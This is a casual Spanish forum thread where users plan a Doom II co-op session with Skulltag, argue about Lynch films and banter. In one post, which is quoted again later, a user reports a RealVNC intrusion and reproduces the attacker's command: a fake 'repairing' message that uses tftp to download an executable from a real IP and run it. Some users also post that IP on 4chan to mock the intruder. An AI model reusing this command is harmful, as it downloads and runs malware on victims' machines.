hablemos de lo que queramos (#79)

oslando escribió:El dia que consiga juntar a varios vips para jugar un coop al doom II, pedire que canonicen este hilo :-P .

Yo llevo semanas diciendolo y todo el mundo "yo me apunto yo me apunto"

Pero esas proposiciones se pierden en el tiempo...como lágrimas en la lluvia :'(

Con el Skulltag no hay problemas para jugar online de forma decente.
MeiSaiDeSi está baneado por "Búscate otro foro. Y haznos un favor: no vuelvas"
Futurama es la caña. Me encanta Vender. Que carisma tieneeeeeeeeeeeeeeeeee [buenazo]
Turyx escribió:Yo llevo semanas diciendolo y todo el mundo "yo me apunto yo me apunto"

Pero esas proposiciones se pierden en el tiempo...como lágrimas en la lluvia :'(

decidme que necesito para jugar online y de forma cooperativa y mañana mismo me pongo con el... :P
red0n escribió:
decidme que necesito para jugar online y de forma cooperativa y mañana mismo me pongo con el... :P

lo mismo digo.
Turyx escribió:Yo llevo semanas diciendolo y todo el mundo "yo me apunto yo me apunto"

yo me apunto XD

Ahora en serio, hubo una temporada en la que jugue bastante, venia todo en un ejecutable y habian bastantes mapas. se habia incorporado la opcion de saltar y todo, dios mio como avanza la tecnologia!!!

edit: aqui esta, mirate esto: http://es.wikipedia.org/wiki/ZDoom
oslando escribió:El dia que consiga juntar a varios vips para jugar un coop al doom II, pedire que canonicen este hilo :-P .

A partir de las 20:00 estoy disponible para ello XD

Otra cosa es que la gente se anime XD

Creo que yo y r09 instalamos Skulltag para ello. Entre Turienzo, oslando, r09 y yo llegamos al limite "oficial" de 4 jugadores :P
MeiSaiDeSi escribió:Futurama es la caña. Me encanta Vender. Que carisma tieneeeeeeeeeeeeeeeeee [buenazo]

PD: http://www.elotrolado.net/post_Bungie--creadores-de-Halo-abandona-Microsoft_1709859139#post1709859139
EPIC QUOTE

Juaner escribió:Y Twin Peaks!!, que mucho seriófilo por aquí pero nadie se acuerda de ella

yo me acuerdo de ella, y ademas la estan reponiendo en cuatro.

twin peaks caca.

tupacamaru escribió:Llego un poco tarde a la conversación, pero como dacía Zorro, a “Twin Peaks” le pasó como a la inmensa mayoría de las series, que las alargan artificialmente y empiezan a sacarse cosas de la manga hasta llegar al “todo vale” y acabar con la coherencia interna.

Al que le guste “Twin Peaks” no debe perderse “Mulholland Drive”, es una de mis películas preferidas y un ejemplo de de maestría del lenguaje cinematográfico.
También es muy buena “Terciopelo azul” (Blue Velvet).
Y para relacionarlo con los videojuegos, la sesión de pelis de David Lynch se puede cerrar con “Dune”, y después echarse unas partidas al glorioso Dune II y matar Harkonen con el sonic tank y los aliados Fremen……

twin peaks caca

mulholland drive caca full equip

blue velvet simplemente aburre, aunque algunas escenitas molan

dune se nota que lynch solo adaptaba (y lo hizo fatal, la pelicula no tiene ritmo ninguno y aburre a las ovejas). Dune II de Westwood mola, el primero de Infogrames no tanto aunque se deja jugar y es una mezcla interesante. Los demas juegos de dune son el dune II con actualizaciones graficas. Esta bien pero no tienen la pegada del original.

he dicho que Lynch me cae mal, me parece un papafrita y no me gustan sus peliculas? :-P

Es el unico que supera en mi lista negra a Tim Burton, de este se salvan algunas pelis (las de batman, sleepy hollow, charlie y por los pelos, eduardo manostijeras)

frann_pc escribió:alguien me hace un resumen de los 3 ultimo hilos. he estado un poco perdido

diskun esta depre, dimes y diretes con las notas de uncharted, assasins y mass effect y las tipicas frikeces varias.

Scatsy escribió:Mirad lo que pasa entrando en [url]www.españa.es,[/url] yo me he partido XD.

Imagen

esto es... [size=200]xn--espaa-rta!!!![/size]

tupacamaru escribió:¿Por qué nos motiva saber que una tía buena es lesbiana, si en realidad es negativo, ya que se reducen las posibilidades de yacer con ella?

aparte de las logicas perversiones desviadas que se pueden criar en la mente, esta el tema de que *sabes* positivamente que no se va a echar a perder acostandose con ningun maromo :-P

ahora es cuando digo que tengo amigas lesbianas, y que me parecen estupendas personas (las que conozco).

... afortunadamente no iba detras de ninguna de las susodichas, el que una tia te corte con un "es que soy lesbiana, sabias?" debe ser de lo peor del universo.

saluditos.

pd. lo que yo decia, no teneis maldito bouquet xD

ppd. os estais pasando msn's y yo durmiendo? WTF! el mio esta en el perfil, el que quiera ya sabe :-P

ultimo REPPDWTFBBQ: me estais diciendo en serio que ese tio es *edit* kojiro y no es el parada? :-P

editado. sorry.... yahiko, kojiro... la tarde me confunde :-P
¿De que? GXY, ese es Kojiro, a mi no me metas en esos fregaos XD
skulltag? ni idea de lo que es. y me reitero: con el zdoom era todo bastante sencillo para echar unas pachangas, anda que no molaba ir con mas de 10 tios a matar cacodemonios ^^

eso si, el zdoom esta modificado hasta las trancas, tiene strafe, musica nueva, mapas nuevos, salto, mas de 4 jugadores... quizas no les guste.
GXY escribió:ultimo REPPDWTFBBQ: me estais diciendo en serio que ese tio es yahiko y no es el parada? :-P

Es Kojiro.
Por cierto, ya os aviso que por vuestra propia integridad no vais a ver una foto mia en la vida XD
GXY escribió:EPIC QUOTE

... afortunadamente no iba detras de ninguna de las susodichas, el que una tia te corte con un "es que soy lesbiana, sabias?" debe ser de lo peor del universo.

saluditos.

pd. lo que yo decia, no teneis maldito bouquet xD

ppd. os estais pasando msn's y yo durmiendo? WTF! el mio esta en el perfil, el que quiera ya sabe :-P

ultimo REPPDWTFBBQ: me estais diciendo en serio que ese tio es yahiko y no es el parada? :-P

Siempre será mejor que te diga que es lesbiana y no que eres más feo que un frigorífico por detrás, vamos no sé
Joder, si el "spameemos todo lo que queramos" se traslada al mesenyé, puede ser mi perdición.

megateto@hotmail.com

la sección eolianos ya está creada...
GXY escribió:... afortunadamente no iba detras de ninguna de las susodichas, el que una tia te corte con un "es que soy lesbiana, sabias?" debe ser de lo peor del universo.

ultimo REPPDWTFBBQ: me estais diciendo en serio que ese tio es yahiko y no es el parada? :-P

A: Eso me recuerda lo que le paso a un colega, conocio dos tias espectaculares, hablo un rato con ellas y eran muy majas, fue a por unas copas y cuando volvio se estaban dando el lote. Fue un EPIC FAIL espectacular XD (y un tanto cruel XD )

B: No es yahiko, es Kojiro photochopeado por Diskun, pero la cara de mala leshe es original suya XD

PD:oslando, Skulltag es una version especificamente mejorada del Doom para online. Tiene busqueda de servidores, modos especiales, etc. Aun tengo que probar como va, pero tiene buena pinta. Aunque para off-line cuando juego uso el Zdoom.
megateto escribió:Joder, si el "spameemos todo lo que queramos" se traslada al mesenyé, puede ser mi perdición.

megateto@hotmail.com

la sección eolianos ya está creada...

DO NOT WANT!!!!!! Si nos agregamos todos, se perderia la esencia de este hilo... yo voto por seguir por aqui.

pd: ya se lo que es el skulltag... una modificacion del zdoom. joder, que anticuado estoy, a la noche lo instalo y probamos, que voy a llegar tarde a la siesta XD.
Vorador escribió:
A: Eso me recuerda lo que le paso a un colega, conocio dos tias espectaculares, hablo un rato con ellas y eran muy majas, fue a por unas copas y cuando volvio se estaban dando el lote. Fue un EPIC FAIL espectacular XD (y un tanto cruel XD )

Pues yo no dejo que nadie se ría de mi así, hubiera seguido ahí como un campeón, a mi rollo y con el suyo. Además, quién sabe si ese día...
oslando escribió:skulltag? ni idea de lo que es. y me reitero: con el zdoom era todo bastante sencillo para echar unas pachangas, anda que no molaba ir con mas de 10 tios a matar cacodemonios ^^

eso si, el zdoom esta modificado hasta las trancas, tiene strafe, musica nueva, mapas nuevos, salto, mas de 4 jugadores... quizas no les guste.

El Skulltag es el mismo estilo que ZDoom

De hecho por lo visto hay piques entre los fans de Skulltag y los de ZDoom xD

El Skulltag además incluye un modo llamado Invasion que es cooperativo y consiste en que vienen oleadas de enemigos.
megateto escribió:

Pues yo no dejo que nadie se ría de mi así, hubiera seguido ahí como un campeón, a mi rollo y con el suyo. Además, quién sabe si ese día...

Hombre, se agarro la tipica depre de 5 minutos y quedo todo en una anecdota. Pero le jodio un poco XD

PD: Insisto, si quereis, a partir de las 8 puedo echar una partidilla en coop al Doom, ademas en coop nunca he jugado, siempre solo y una vez un deathmatch
tambien esta la tipica lesbiana que deja de ser lesbiana...
DOOM

Así llamo la atención a quien le interese. A las 20:30 montamos un Cooperativo en el Skulltag.
Mejor si somos 4 o más.

Aunque estuve pensando y no estoy seguro si es posible jugar más de 4 en Cooperativo, aunque supongo que sí.

Y si no, modo Invasión y a tomar por saco
Turyx escribió:El Skulltag es el mismo estilo que ZDoom

De hecho por lo visto hay piques entre los fans de Skulltag y los de ZDoom xD

El Skulltag además incluye un modo llamado Invasion que es cooperativo y consiste en que vienen oleadas de enemigos.

Do want, pero vaya tostón ahora bajarme .wads y demás. ¿Está todo en un exe o hay que ir con rollos de esos?
Samerman escribió:Do want, pero vaya tostón ahora bajarme .wads y demás. ¿Está todo en un exe o hay que ir con rollos de esos?

Pues necesitas el .wad del Doom 2, que lo encuentras perfectamente en cualquier web de Abandonware

Voy a mirarme como va lo de crear servidores usando el IdeSE antes de irme.

Será la version v0.97d-beta4.3 del Skulltag y el Doom 2.
yo me apuntaria , pero no tengo a mano ni una cosa ni otra XD .

En otro orden de cosas , me jode que por estas fechas la peña empiece a ponerle un puto gorrito de santa a sus avatares [uzi]
Fale, Vorador strikes at 20:30.

PD: Doom 2 original en CD en mi mano XD Turyx, supongo que tengo la ultima version, si no, lo actualizo.
Turyx escribió:DOOM

Así llamo la atención a quien le interese. A las 20:30 montamos un Cooperativo en el Skulltag.
Mejor si somos 4 o más.

yo hoy paso, que entro a trabajar temprano hoy. (cachis...)
GXY escribió:
twin peaks caca

mulholland drive caca full equip

blue velvet simplemente aburre

etc...

Ya sabíamos el mal gusto que te gastas para con las féminas. Ahora también sabemos que tampoco tienes gusto en cuanto a pelis. [sati]

Lo de las tías, no hagas caso. Sigue poniendo fotos, que a mí me molan el 90% de las que pones
Yo me apunto, pero antes avisa y di dónde nos metemos y eso.
Yo estoy fuera de 19:30 a 21:30, retrasadlo porfaplis [boing]
r09 escribió:Yo me apunto, pero antes avisa y di dónde nos metemos y eso.

Creo que Turyx creara el servidor y nos avisara primero.
Joder que flipante. Me acaban de entrar en el PC por el RealVNC server. Suerte que estaba en el PC y he podido evitar que "alguien" abriera la ventana de comandos y ejecutara esto:

%comspec% /c echo Repairing user32.dll & echo Please wait... & tftp -i 24.45.24.185 GET jnmzlkda.exe & start jnmzlkda&

Que chungo no? :S

Bueno he cerrado y quitado el servicio del VNC porque no me hace falta ahora pero... como coño ha entrado? Que asquito
Turienzo, me habia confundido; al que yo jugaba era al Zdaemon. tiene descarga de wad's automaticas (vamos, que si no tienes el mapa en cuestion al empezar la partida, te lo descarga en un plis). no se si este skulltag sera tan sencillo y directo, pero da igual, lo que sea y a lo que venga.

En fin, a las 7 (a las 8 por ahi arriba XD), te agrego al msn y miramos el tema, que yo no tengo na descargau. nos vemos.
Jo, empiezo a sentir pena por este pobre chico, que se pensaba que tenía una joya o algo así, espero que no acabe la cosa como el último que se llevó un chasco.
Vitet, postea en 4chan /b/ esa IP y con un cartel de n00b. Para dar un poco por culo. [+risas]
bueno ya tengo a la mula trabajando en el doom 2
Scatsy escribió:Jo, empiezo a sentir pena por este pobre chico, que se pensaba que tenía una joya o algo así, espero que no acabe la cosa como el último que se llevó un chasco.

Qué violento el primer hilo :S

Y al otro le habeis chafao al pobre
AsKaRy escribió:bueno ya tengo a la mula trabajando en el doom 2

Es muy facil de encontrar en descarga directa, no es por nada XD

PD:Y te he robado la imagen de Double Fail del hilo del hombre despistado. El del Bungie se va de MS.
Samerman escribió:Yo estoy fuera de 19:30 a 21:30, retrasadlo porfaplis [boing]

Puedes meterte aunque llevemos ya media partida.

-A ver, descargaos la ultima version de Skulltag:
http://www.skulltag.com
-Luego el Wad del Doom 2(se pueden dar URLs a paginas abandonware?)
-Abriis el Skulltag y si solo teneis el wad de Doom 2 pues se abrirá ese automaticamente. Os configurais los botones y el aspecto del personaje
-Esperais a que cree el server dentro de un par de horas xD
-Para navegar por los servers es mejor usar el IdeSE que viene con el Skulltag, cuando os avise que he creado el server le dais a Refresh y buscais.

Supongo que es mejor si se abre el puerto que se usa pero bueno
Vorador escribió:Vitet, postea en 4chan /b/ esa IP y con un cartel de n00b. Para dar un poco por culo. [+risas]

Lo acabo de hacer yo por él XD.
Turyx escribió:-Luego el Wad del Doom 2(se pueden dar URLs a paginas abandonware?)

El doom 2 aun se "vende", asi que tecnicamente no es abandonware. Asi que no recomendaria enlaces.
Samerman escribió:Lo acabo de hacer yo por él XD.

Ahora dirá "No, si esa es mi IP"
Vitet escribió:Joder que flipante. Me acaban de entrar en el PC por el RealVNC server. Suerte que estaba en el PC y he podido evitar que "alguien" abriera la ventana de comandos y ejecutara esto:

%comspec% /c echo Repairing user32.dll & echo Please wait... & tftp -i 24.45.24.185 GET jnmzlkda.exe & start jnmzlkda&

Que chungo no? :S

Bueno he cerrado y quitado el servicio del VNC porque no me hace falta ahora pero... como coño ha entrado? Que asquito

esos servicios hay que ponerlos con clave, puertos rarunos y tenerlos vigilados, porque son el mal.

y por cierto... que COJONES es eso que iban a hacer con tu PC? suena a "te pongo un mensaje xhorra, mientras tanto descargo un programa de mierda y lo ejecuto"

saludos.
mepirulo escribió:
Qué violento el primer hilo :S

Y al otro le habeis chafao al pobre

¿Violento? en todo caso el segundo que acabó en baneos XD, yo me partí con el segundo.
Vorador escribió:
El doom 2 aun se "vende", asi que tecnicamente no es abandonware. Asi que no recomendaria enlaces.

doom/doom2 no fueron liberados por id software?

saludos.
Scatsy escribió:

¿Violento? en todo caso el segundo que acabó en baneos XD, yo me partí con el segundo.

Los he mezclao, la verdad que si hay algo más triste que eso es que ahora está intentando venderlos es bastante cómico
ya me pillao en DD , pero ese me va a pedales ( manda cojones que en un 386 iba bien , y en un p4 3ghz no . . . lol ) asi que no estoy trasteando las config y con la mula pillando otras versiones , a ver
Samerman escribió:
Lo acabo de hacer yo por él XD.

Mejor porque no entro casi nunca en 4chan :P Ya me dirás el link jejeje

GXY

Pues ni zorra, supongo que meterme un troyano. Aunque el mensaje no hubiera colado ni de coña XD

El programa lo tengo con clave pero lo tenía con el puerto por defecto. Lo que haré será cambiarlo y cuando lo quiera usar abriré el puerto por el router y mientras lo tengo cerrado y au.
GXY escribió:doom/doom2 no fueron liberados por id software?

saludos.

No creo, en todo caso liberarían el motor, como hicieron con el de Quake por ejemplo. Por vender venden incluso el Wolfenstein original por Steam.
GXY escribió:

saludos.

El engine si, pero el WAD es aun comercial

Id ha liberado sus motores graficos hasta el Quake 3 si mal no recuerdo. Pero los datos del juego (modelos, armas, escenarios, texturas, etc) son privados.
GXY escribió:

saludos.

Los venden por Steam a si que no se, aunque también venden el Keen Commander XD.
502 respuestas
14, 5, 6, 7, 811